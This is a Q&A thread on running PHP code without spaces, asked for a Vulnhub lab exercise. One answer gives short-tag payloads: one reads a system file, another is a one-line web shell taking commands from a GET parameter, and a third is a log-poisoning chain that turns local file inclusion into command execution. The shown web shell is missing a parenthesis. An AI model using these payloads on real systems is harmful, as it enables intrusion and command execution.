# Insert PHP codes without spaces

Tags: php

How can I insert php code without spaces like

```
<?phpecho'hello';?>
```

But I need it to be executed without errors not like the code above

Comment: Why do you need to do this?  It sounds like an XY problem - https://meta.stackexchange.com/questions/66377/what-is-the-xy-problem

Comment: Yeah I was testing a vulnerability in Vulnhub Machine and it appears that the user's input is executed but it is splitted by spaces and it takes only the field before the first space, so I wondered how I can run php code without spaces.

Comment: `echo("hello");` does the same thing without spaces.

Comment: The php tag is required for the script to recognize it's php

Comment: <?php echo'hello' ;?> ...

Answer (score 0, accepted):

Use PHP [short syntax](https://www.php.net/manual/en/language.basic-syntax.phptags.php)

```
<?='hello'?>
```

this the same as

```
<?php echo 'hello'; ?>
```

Comment: Is there a way to do other commands (than echo) without spaces ?

Comment: No, this is the only way. Just a shorthand for echo. But where is your problem with the spaces? `<?php doSomething(); ?>` is not bad at all.

Comment: Thanks, it's just about a vulnerability in Vulnhub Machine and it appears that the user's input is executed but it is splitted by spaces and it takes only the field before the first space, so I wondered how I can run php code without spaces. That's the reason

Answer (score 0):

For anyone who stumbles this answer later on. The shorthand syntax as noted in the other answer will work, however, it can be used to execute other functions in the same way you can you pass output to echo. For Example:

```
<?=file_get_contents('/etc/password')?>
```

is equivalent to:

```
<?php echo file_get_contents('/etc/password'); ?>
```

you can also take this a step further to remove code execution by doing:

```
<?=system($_GET['c']?>
```

This is really helpful/dangerous (depending on perspective :) ) if you have a local file inclusion vulnerability that lets you include things like Web Server access logs.

e.g:

```
http://localhost/?<?=system($_GET['c']?>

http://localhost/vuln.php?include=/var/log/httpd/access.log&c=touch+/tmp/vulnerable
```